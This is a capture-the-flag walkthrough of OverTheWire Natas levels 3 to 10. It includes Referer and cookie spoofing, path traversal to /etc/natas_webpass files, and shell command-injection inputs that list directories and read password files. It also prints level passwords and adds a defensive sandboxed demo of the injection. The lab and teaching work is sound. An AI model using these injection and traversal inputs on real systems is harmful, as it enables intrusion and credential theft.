                    L3:
                    User-agent: *
                    Disallow: /s3cr3t/

                    http://natas3.natas.labs.overthewire.org//s3cr3t/users.txt
                    natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

                    L4:
                    Burp -> Proxy -> Intercept On -> Add -> Referer natas5.natas.labs.overthewire.org

                    Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

                    L5:
                    GET / HTTP/1.1
                    Host: natas5.natas.labs.overthewire.org
                    Cache-Control: max-age=0
                    Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, sdch
                    Accept-Language: bg,en-US;q=0.8,en;q=0.6
                    Cookie: __cfduid=ddd2731304b504d954af409bf2c0724731481120164; loggedin=1
                    DNT: 1
                    Connection: close

                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas5", "pass": "iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" };</script></head>
                    <body>
                    <h1>natas5</h1>
                    <div id="content">
                    Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1</div>
                    </body>
                    </html>

                    L6:
                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas6", "pass": "<censored>" };</script></head>
                    <body>
                    <h1>natas6</h1>
                    <div id="content">

                    <?

                    include "includes/secret.inc";

                        if(array_key_exists("submit", $_POST)) {
                            if($secret == $_POST['secret']) {
                            print "Access granted. The password for natas7 is <censored>";
                        } else {
                            print "Wrong secret";
                        }
                        }
                    ?>

                    <form method=post>
                    Input secret: <input name=secret><br>
                    <input type=submit name=submit>
                    </form>

                    <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
                    </div>
                    </body>
                    </html>

                    http://natas6.natas.labs.overthewire.org/includes/secret.inc
                    <?
                    $secret = "FOEIUWGHFEEUHOFUOIU";
                    ?>

                    Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

                    L7:

                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas7", "pass": "7z3hEENjQtflzgnT29q7wAvMNfZdh0i9" };</script></head>
                    <body>
                    <h1>natas7</h1>
                    <div id="content">

                    <a href="index.php?page=home">Home</a>
                    <a href="index.php?page=about">About</a>
                    <br>
                    <br>

                    <!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
                    </div>
                    </body>
                    </html>

                    http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
                    DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

                    L8:
                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas8", "pass": "<censored>" };</script></head>
                    <body>
                    <h1>natas8</h1>
                    <div id="content">

                    <?

                    $encodedSecret = "3d3d516343746d4d6d6c315669563362";

                    function encodeSecret($secret) {
                        return bin2hex(strrev(base64_encode($secret)));
                    }

                    if(array_key_exists("submit", $_POST)) {
                        if(encodeSecret($_POST['secret']) == $encodedSecret) {
                        print "Access granted. The password for natas9 is <censored>";
                        } else {
                        print "Wrong secret";
                        }
                    }
                    ?>

                    <form method=post>
                    Input secret: <input name=secret><br>
                    <input type=submit name=submit>
                    </form>

                    <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
                    </div>
                    </body>
                    </html>

                    echo 3d3d516343746d4d6d6c315669563362 | xxd -r -p | rev | base64 -d

                     oubWYf2kBq

                     Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl


                     L9:
                     <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas9", "pass": "W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl" };</script></head>
                    <body>
                    <h1>natas9</h1>
                    <div id="content">
                    <form>
                    Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
                    </form>


                    Output:
                    <pre>
                    </pre>

                    <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
                    </div>
                    </body>
                    </html>

                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas9", "pass": "<censored>" };</script></head>
                    <body>
                    <h1>natas9</h1>
                    <div id="content">
                    <form>
                    Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
                    </form>


                    Output:
                    <pre>
                    <?
                    $key = "";

                    if(array_key_exists("needle", $_REQUEST)) {
                        $key = $_REQUEST["needle"];
                    }

                    if($key != "") {
                        passthru("grep -i $key dictionary.txt");
                    }
                    ?>
                    </pre>

                    <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
                    </div>
                    </body>
                    </html>

                     http://natas9.natas.labs.overthewire.org/dictionary.txt

                     test; ls -la ../
                     Output:
                    -rw-r-----  1 natas9 natas9 460878 Jun 25  2016 dictionary.txt

                    ../:
                    total 156
                    drwxr-xr-x 39 root    root     4096 Jul 10 14:12 .
                    drwxr-xr-x  5 root    root     4096 Nov 14  2014 ..
                    drwxr-xr-x  5 root    root     4096 Jun 25  2016 main
                    drwxr-x---  2 natas0  natas0   4096 Jun 25  2016 natas0
                    drwxr-x---  2 natas1  natas1   4096 Jun 25  2016 natas1
                    drwxr-x---  2 natas10 natas10  4096 Jun 25  2016 natas10
                    drwxr-x---  2 natas11 natas11  4096 Jun 25  2016 natas11
                    drwxr-x---  3 natas12 natas12  4096 Jun 25  2016 natas12
                    drwxr-x---  3 natas13 natas13  4096 Jun 25  2016 natas13
                    drwxr-x---  2 natas14 natas14  4096 Jun 25  2016 natas14
                    drwxr-x---  2 natas15 natas15  4096 Jun 25  2016 natas15
                    drwxr-x---  2 natas16 natas16  4096 Jun 25  2016 natas16
                    drwxr-x---  2 natas17 natas17  4096 Jul 10 14:12 natas17
                    drwxr-x---  2 natas18 natas18  4096 Jun 25  2016 natas18
                    drwxr-x---  2 natas19 natas19  4096 Jun 25  2016 natas19
                    drwxr-x---  3 natas2  natas2   4096 Jun 25  2016 natas2
                    drwxr-x---  2 natas20 natas20  4096 Jun 25  2016 natas20
                    drwxr-x---  2 natas21 natas21  4096 Jun 25  2016 natas21
                    drwxr-x---  2 natas21 natas21  4096 Jun 25  2016 natas21-experimenter
                    drwxr-x---  2 natas22 natas22  4096 Jun 25  2016 natas22
                    drwxr-x---  2 natas23 natas23  4096 Jun 25  2016 natas23
                    drwxr-x---  2 natas24 natas24  4096 Jun 25  2016 natas24
                    drwxr-x---  3 natas25 natas25  4096 Jun 25  2016 natas25
                    drwxr-x---  3 natas26 natas26  4096 Jun 25  2016 natas26
                    drwxr-x---  2 natas27 natas27  4096 Jun 25  2016 natas27
                    drwxr-x---  2 natas28 natas28  4096 Jun 25  2016 natas28
                    drwxr-x---  2 natas29 natas29  4096 Jun 25  2016 natas29
                    drwxr-x---  3 natas3  natas3   4096 Jun 25  2016 natas3
                    drwxr-x---  2 natas30 natas30  4096 Jun 25  2016 natas30
                    drwxr-x---  3 natas31 natas31  4096 Jun 25  2016 natas31
                    drwxr-x---  3 natas32 natas32  4096 Jun 25  2016 natas32
                    drwxr-x---  2 natas33 natas33  4096 Jun 25  2016 natas33
                    drwxr-x---  2 natas4  natas4   4096 Jun 25  2016 natas4
                    drwxr-x---  2 natas5  natas5   4096 Jun 25  2016 natas5
                    drwxr-x---  3 natas6  natas6   4096 Jun 25  2016 natas6
                    drwxr-x---  2 natas7  natas7   4096 Jun 25  2016 natas7
                    drwxr-x---  2 natas8  natas8   4096 Jun 25  2016 natas8
                    drwxr-x---  2 natas9  natas9   4096 Jun 25  2016 natas9
                    drwxr-x---  4 root    www-data 4096 Jun 25  2016 stats

                    test; ls -la ../../../../../
                    Output:
                    -rw-r-----  1 natas9 natas9 460878 Jun 25  2016 dictionary.txt

                    ../../../../../:
                    total 7965
                    drwxr-xr-x  26 root root    4096 Mar 13  2016 .
                    drwxr-xr-x  26 root root    4096 Mar 13  2016 ..
                    -rw-r--r--   1 root root    2797 Nov  4  2015 README.txt
                    lrwxrwxrwx   1 root root      15 Nov 14  2014 behemoth -> /games/behemoth
                    drwxr-xr-x   2 root root    4096 Nov 17 09:14 bin
                    drwxr-xr-x   2 root root    4096 Apr 20  2014 boot
                    drwxr-xr-x  12 root root   13680 Dec 23 13:00 dev
                    drwxr-xr-x   7 root root    4096 Jan 12  2015 drifter
                    lrwxrwxrwx   1 root root      11 Nov 14  2014 eloi -> /games/eloi
                    drwxr-xr-x 108 root root    4096 Jan  6 13:46 etc
                    drwxr-xr-x  11 root root    1024 Mar 18  2015 games
                    drwxr-xr-x 172 root root    4096 Jul 10 14:12 home
                    lrwxrwxrwx   1 root root      14 Nov 14  2014 krypton -> /games/krypton
                    drwxr-xr-x  18 root root    4096 Jun 10  2016 lib
                    drwxr-xr-x   2 root root    4096 Jun 10  2016 lib32
                    drwxr-xr-x   2 root root    4096 Jun 10  2016 lib64
                    drwxr-xr-x   2 root root    4096 Jun 10  2016 libx32
                    drwx------   2 root root   16384 Apr 20  2014 lost+found
                    lrwxrwxrwx   1 root root      14 Nov 14  2014 manpage -> /games/manpage
                    lrwxrwxrwx   1 root root      11 Nov 14  2014 maze -> /games/maze
                    drwxr-xr-x   3 root root    4096 Apr 20  2014 media
                    drwxr-xr-x   2 root root    4096 Apr 10  2014 mnt
                    lrwxrwxrwx   1 root root      13 Nov 14  2014 narnia -> /games/narnia
                    drwxr-xr-x   2 root root    4096 Apr 16  2014 opt
                    dr-xr-xr-x 547 root root       0 Dec 23 13:00 proc
                    drwx------  11 root root    4096 Jul 10 14:12 root
                    drwxr-xr-x  18 root root     680 Jan  6 20:52 run
                    drwxr-xr-x   2 root root   12288 Sep 30 13:28 sbin
                    lrwxrwxrwx   1 root root      13 Nov 14  2014 semtex -> /games/semtex
                    drwxr-xr-x   2 root root    4096 Apr 16  2014 srv
                    dr-xr-xr-x  13 root root       0 Dec 23 13:29 sys
                    drwxrwx-wt   1 root root 8036352 Jan  6 20:52 tmp
                    drwxr-xr-x  12 root root    4096 Nov 14  2014 usr
                    lrwxrwxrwx   1 root root      13 Nov 14  2014 utumno -> /games/utumno
                    drwxr-xr-x  15 root root    4096 Nov 14  2014 var
                    lrwxrwxrwx   1 root root      13 Nov 14  2014 vortex -> /games/vortex

                    test;cat ../../../../../README.txt
                    Output:
                                 
                          ,----..            ,----,          .---.
                         /   /   \         ,/   .`|         /. ./|
                        /   .     :      ,`   .'  :     .--'.  ' ;
                       .   /   ;.  \   ;    ;     /    /__./ \ : |
                      .   ;   /  ` ; .'___,/    ,' .--'.  '   \' .
                      ;   |  ; \ ; | |    :     | /___/ \ |    ' '
                      |   :  | ; | ' ;    |.';  ; ;   \  \;      :
                      .   |  ' ' ' : `----'  |  |  \   ;  `      |
                      '   ;  \; /  |     '   :  ;   .   \    .\  ;
                       \   \  ',  /      |   |  '    \   \   ' \ |
                        ;   :    /       '   :  |     :   '  |--"
                         \   \ .'        ;   |.'       \   \ ;  
                      www. `---` ver     '---' he       '---" ire.org  
                                 
                               
                    Welcome to the OverTheWire games machine!

                    If you find any problems, please report them to Steven on
                    irc.overthewire.org.

                    --[ Playing the games ]--

                      This machine holds several wargames.
                      If you are playing "somegame", then:

                        * USERNAMES are somegame0, somegame1, ...
                        * Most LEVELS are stored in /somegame/.
                        * PASSWORDS for each level are stored in /etc/somegame_pass/.

                      Write-access to homedirectories is disabled. It is advised to create a
                      working directory with a hard-to-guess name in /tmp/.  You can use the
                      command "mktemp -d" in order to generate a random and hard to guess
                      directory in /tmp/.  Read-access to both /tmp/ and /proc/ is disabled
                      so that users can not snoop on eachother.

                      Please play nice:
                       
                        * don't leave orphan processes running
                        * don't leave exploit-files laying around
                        * don't annoy other players
                        * don't post passwords or spoilers
                        * again, DONT POST SPOILERS!
                          This includes writeups of your solution on your blog or website!

                    --[ Tips ]--

                      This machine has a 64bit processor and many security-features enabled
                      by default, although ASLR has been switched off.  The following
                      compiler flags might be interesting:

                        -m32                    compile for 32bit
                        -fno-stack-protector    disable ProPolice
                        -Wl,-z,norelro          disable relro

                      In addition, the execstack tool can be used to flag the stack as
                      executable on ELF binaries.

                      Finally, network-access is limited for most levels by a local
                      firewall.

                    --[ Tools ]--

                     For your convenience we have installed a few usefull tools which you can find
                     in the following locations:

                        * peda (https://github.com/longld/peda.git) in /usr/local/peda/
                        * gdbinit (https://github.com/gdbinit/Gdbinit) in /usr/local/gdbinit/
                        * pwntools (https://github.com/Gallopsled/pwntools) in /usr/src/pwntools/
                        * radare2 (http://www.radare.org/) should be in $PATH

                    --[ More information ]--

                      For more information regarding individual wargames, visit
                      http://www.overthewire.org/wargames/

                      For questions or comments, contact us through IRC on
                      irc.overthewire.org.

                     test;cat ../../../../../etc/natas_webpass/natas10
                     nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

                     test;cat ../../../../../etc/lsb-release
                     DISTRIB_ID=Ubuntu
                    DISTRIB_RELEASE=14.04
                    DISTRIB_CODENAME=trusty
                    DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"

                    L10:
                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas10", "pass": "<censored>" };</script></head>
                    <body>
                    <h1>natas10</h1>
                    <div id="content">

                    For security reasons, we now filter on certain characters<br/><br/>
                    <form>
                    Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
                    </form>


                    Output:
                    <pre>
                    <?
                    $key = "";

                    if(array_key_exists("needle", $_REQUEST)) {
                        $key = $_REQUEST["needle"];
                    }

                    if($key != "") {
                        if(preg_match('/[;|&]/',$key)) {
                            print "Input contains an illegal character!";
                        } else {
                            passthru("grep -i $key dictionary.txt");
                        }
                    }
                    ?>
                    </pre>

                    <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
                    </div>
                    </body>
                    </html>

                    . /etc/natas_webpass/natas11
                    U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
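
The natas9 and natas10 sources above paste `$key` into a shell command string, and the natas10 blacklist only rejects `;`, `|` and `&`. As an added example (not part of the original notes), this POSIX shell script reproduces that parsing in a throwaway temp directory and compares it with a grep call that receives the key as a single literal argument. The sandbox files, `secret.txt` and all function names are constructed for illustration.

```shell
#!/bin/sh
# Added example: runs in a constructed sandbox, not against the wargame server.

# Build a throwaway directory with a word list and a file the search
# feature is never supposed to read (both constructed for this demo).
setup_sandbox() {
    SANDBOX=$(mktemp -d) || return 1
    printf 'apple\nbanana\ncherry\n' > "$SANDBOX/dictionary.txt"
    printf 'CONSTRUCTED-SECRET\n' > "$SANDBOX/secret.txt"
}

# The natas10 blacklist, preg_match('/[;|&]/', $key): returns 0 when the
# key contains none of ; | & and would therefore reach passthru().
passes_filter() {
    case $1 in
        *';'*|*'|'*|*'&'*) return 1 ;;
        *) return 0 ;;
    esac
}

# Equivalent of passthru("grep -i $key dictionary.txt"): the key is pasted
# into a command string, so sh re-parses it (word splitting, separators).
# stdin is /dev/null so a grep left without file operands cannot block.
search_vulnerable() {
    ( cd "$SANDBOX" && sh -c "grep -i $1 dictionary.txt" </dev/null 2>/dev/null )
}

# Hardened form: the key is never parsed by a shell. It is one argv element,
# -F treats it as a literal string, and -- stops it being read as an option.
search_hardened() {
    ( cd "$SANDBOX" && grep -i -F -- "$1" dictionary.txt 2>/dev/null )
}

run_demo() {
    setup_sandbox || return 1
    key='. secret.txt'   # contains no ; | &, so the blacklist accepts it
    if passes_filter "$key"; then echo "filter: accepted"; fi
    echo "vulnerable:"; search_vulnerable "$key" || true
    echo "hardened:";   search_hardened "$key" || true
    rm -rf "$SANDBOX"
}

run_demo
```

In the PHP source the equivalent change is to pass the key through `escapeshellarg()` and place it after `--`, so the filter no longer has to enumerate dangerous characters.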

                    Regards,
                    Yuriy Stanchev/URIX